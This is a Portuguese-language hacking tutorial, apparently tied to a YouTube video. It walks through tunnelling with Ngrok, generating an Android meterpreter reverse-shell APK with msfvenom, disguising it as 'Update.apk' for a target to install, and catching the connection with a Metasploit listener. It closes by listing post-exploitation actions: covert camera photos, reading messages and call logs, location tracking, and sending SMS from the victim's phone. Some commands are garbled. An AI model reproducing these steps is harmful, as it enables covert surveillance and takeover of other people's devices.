Hacking over WAN
Pode ver o meu Video-tutorial no youtube aqui:
https://youtu.be/Bbp-AcejtHI
Usualmente na WAN, primeiro precisa de ter um IP/Hostname estático e, segundo, precisa de fazer o Port Forwarding para permitir a transmissão do seu tráfego, e todos sabemos que ambos são tão difíceis em tempo real, uma vez que temos acesso limitado às portas de uma rede.
Então, o que vamos fazer neste cenário, vamos configurar um túnel seguro usando Ngrok.
Ngrok é um sistema de proxy reverso de tunelamento que estabelece túneis a partir de endpoint público, ou seja, uma internet para um serviço de rede rodando localmente. Isso pode nos ajudar a criar uma URL pública HTTP/HTTPS para um site rodando localmente em nossa máquina. Nós não precisamos fazer nenhum tipo de encaminhamento de portas enquanto usamos o Ngrok e nosso serviço de rede irá eventualmente expor à internet com a ajuda do TCP tunneling.
Seguir estes passos para prosseguir:
Passo1: Cadastre-se para a Conta Ngrok para baixá-la.
Primeiro, você precisará se cadastrar para a Conta Ngrok, depois disso, ela o levará para a janela de download.
Após a assinatura, você poderá baixar o Ngrok para o seu sistema Linux.
>
>
Simplesmente descomprima o arquivo baixado.
>
Step2: Conecte sua conta
>
Executar este comando adicionará seu auth token ao arquivo de configuração padrão ngrok.yml
. Isto lhe dará acesso a mais recursos e tempos de sessão mais longos. (Você tem que copiar e colar seu próprio token aqui fornecido na tela inicial do ngrok após o login)
>
./ngrok authtoken <seu token>
Agora você está pronto para usar esta ferramenta. Abra seu terminal mova para o diretório onde você extraiu a ferramenta Ngrock e digite:
./ngrok tcp
escolha um número de porta na qual você quer ligar uma conexão(aqui, eu escolhi 5555 como número de porta). E depois de clicar em enter, uma tela algo assim será mostrado.
O encaminhamento aqui especifica o túnel TCP que o ngrok criou. A conexão se ligou ao localhost na porta 5555. Agora precisamos gerar uma carga útil maliciosa usando msfvenom.
Step3: Generating Payload
Você pode fazer isso abrindo um novo Terminal em sua máquina Kali Linux e então digitando o seguinte código.
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk
Mas lembre-se, desta vez é um pouco diferente do ataque que costumávamos fazer na LAN. Aqui no lugar do endereço IP, teremos que digitar o link de encaminhamento fornecido no ngrok (2.tcp.ngrok.io). E o número da porta vai ser 15787. Lembre-se que, é importante digitar o mesmo número de porta fornecido pelo Ngrok no encaminhamento de porta.
Nota: Se digitar o endereço IP como 2.tcp.ngrok.io não está funcionando, você pode substituí-lo por um endereço IP que você pode obter usando o comando “ping”.
Abrir um terminal e digitar ping 2.tcp.ngrok.io e pressionar enter. Você receberá um endereço IP que você tem que colocar no lugar de LHOST.
Aqui, eu usei “Update.apk” como o nome do arquivo para a nossa carga útil. Este arquivo deve ser instalado no dispositivo Android do nosso alvo. Mas antes de instalar este ficheiro, temos de definir o nosso ouvinte. Para o fazer, siga o passo 4.
Passo4: Set-Up a Listener
Abra seu terminal e carrega o console Metasploit, digitando: msfconsole
Depois de carregar (após alguns segundos), carregue o exploit multi-handler digitando:
>
use exploit/multi/handler
Agora configure uma carga útil inversa digitando:
>
set payload android/meterpreter/reverse_tcp
Configure o seu LHOST como 0.0.0.0 e LPORT como 5555
(O número da porta deve ser igual ao número da porta que foi usada para ligar a conexão no ngrok)
>
set LHOST 0.0.0.0.0
set LPORT 5555
Finalmente, digite exploit para iniciar o ouvinte.
>
Pós-Exploração
Digite ajuda para ver as várias opções que você pode usar para realizar as diferentes tarefas no dispositivo da vítima.
Você pode acessar a câmera deles e tirar uma foto sem notificá-los. Você pode verificar suas mensagens, registros de chamadas e salvá-las em seu sistema também.
Tambem, pode ver e abrir qualquer aplicação instalada no dispositivo deles. Você pode até obter as coordenadas da localização atual do usuário.
Você também pode enviar mensagens para qualquer número de contato através do dispositivo deles.